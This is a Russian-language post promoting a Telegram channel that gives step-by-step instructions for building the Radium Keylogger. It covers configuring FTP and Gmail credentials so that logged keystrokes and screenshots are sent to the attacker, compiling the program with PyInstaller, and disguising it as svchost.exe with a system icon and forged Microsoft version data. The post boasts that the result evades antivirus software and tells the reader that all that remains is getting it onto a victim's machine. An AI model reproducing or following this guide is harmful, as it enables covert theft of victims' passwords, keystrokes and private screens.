Подробный мануал по созданию кейлоггера
https://t.me/the_darkest
Подпишись на наш канал https://t.me/the_darkest если хочешь ещё больше годных тем заработка.
Что нам понадобится?
1. Гуглим название "Radium Keylogger" и качаем все с гитхаба, распаковываем в рандомную папку.
2. Гуглим "Python2.7 скачать бесплатно без смс в высоком качестве" загружаем и устанавливаем с параметрами по умолчанию, единственное о чем хотелось бы сказать, что нужно выбрать ВСЕ компоненты для установки в окне выбора компонентов для установки соответственно.
В противном случае вас ждут проблемы, не буду описывать подробностей.
3. Так же все загружаем и устанавливаем оттуда же, со страницы Radium Keylogger на гитхабе из раздела Requirements (PyHook; PyWin32; Microsoft Visual C++ Compiler for Python) кроме PyInstaller. Его мы установим ручками в следующем шаге.
4. Открываем PowerShell от имени администратора. Далее переходим в папку с распакованными исходниками с помощью команды:
cd С:\полный\путь\до\ исходников
Потом выполняем комманду
pip install pyinstaller
так же следом установим рекомендованные пакеты
pip install -r .\requirements.txt
5. Открываем исходник Radiumkeylogger.py в вашем любимом текстовом редакторе можете хоть в Word.
Ищем строки
ip = base64.b64decode("") #IP to connect to FTP server адрес или домен ФТП сервера.
ftpkey = base64.b64decode("") #FTP password Пароль от ФТП сервера.
ftpuser = base64.b64decode("") #FTP username Имя пользователя ФТП сервера.
passkey = base64.b64decode("") #Password to connect to GMAIL smtp server Пароль от почты.
userkey = base64.b64decode("") #Username to connect to GMAIL smtp server Имя пользователя.
Из названия не трудно догадаться что для чего. Но все же скажу что нужно сделать.
Заменяем значения вида base64.b64decode("") на просто тупо "ваше значение". Если не лень можете сконвертировать ваши данные в кодировку base64 с помощью любого онлайн конвертера и прописать значение в кавычки между скобок.
6. Пройдемся по исходнику и для порядка и маскировки поправим везде где упоминается "AdobePush.exe" на "svchost.exe". Так же заменим "Radiumkeylogger.py" и "AdobePush.py" на svchost.exe для обеспечения работоспособности автозагрузки.
7. Компилируем все в исполняемый файл, в том же окне PowerShell
выполняем команду
pyinstaller —onefile —windowedRadiumkeylogger.py
Если вы все делали правильно в папке с исходниками появится пара папок. В папке dist и будет ваш долгожданный кейлогер. Весит сие чудо 9100Kb. Что очень печально для малвари должен я сказать, но ничего не поделаешь, я не стал заморачиваться ибо не для себя. Тем более, что стандартный svchost иногда и все 50Mb отжирает и если он будет весить 20Kb может вызвать подозрение у опытного пользователя.
8. На этом еще не все, с паковкой и криптом можете сами заморочиться, мы сейчас же произведем базовую маскировку. Качаем и устанавливаем программы VerPatch и Resource Hacker. Для вашего удобства выбрал самое общедоступное.
9. Переименовываем получившийся файл в svchost.exe. Открываем с помощью Resource Hacker библиотеку /Windows/system32/imageres.dll и сохраняем все ее ресурсы в какую либо папку, думаю с функционалом этой программы вы разобраться в состоянии.
Далее открываем наш кейлогер и заменяем его иконку на 15.ico это стандартная иконка для приложений внутри которых нет ресурсов, с этой же иконкой и отображаются основные системные процессы Windows. Сохраняем и выходим.
10. Копируем наш файл в папку с распакованным VerPatch. Открываем командную строку и переходим в эту папку.
Выполняем команду
verpatch svchost.exe 6.3.9600.0 /va /s description "Host Process for Windows Services" /s product "Microsoft Windows"
Если система с российской локалью замените "Host Process for Windows Services" на Хост процесс для сервисов Windows или как там мать ее.
После этого наш кейлогер будет палиться только тем что запущен от имени пользователя. Впрочем и эту проблему можно легко решить погуглив пару минут.
11. Все. Можно запускать и проверять электронную почту, после запуска должно придти уведомление на электронную почту что все ОК.
Хотелось бы предупредить, что логи отправляются по умолчанию после набора 300 символов скриншоты после набора 500 символов, скриншоты пакуются по 10 штук и отправляются на почту как и логи. Естественно покопавшись ручками в исходнике все значения можно заменить под ваши требования.
Как вы видите он не детектится основными антивирусами лишь только какими то совсем экзотическими. Вам остается только решить вопрос доставки его на машину жертвы.
Удачи!
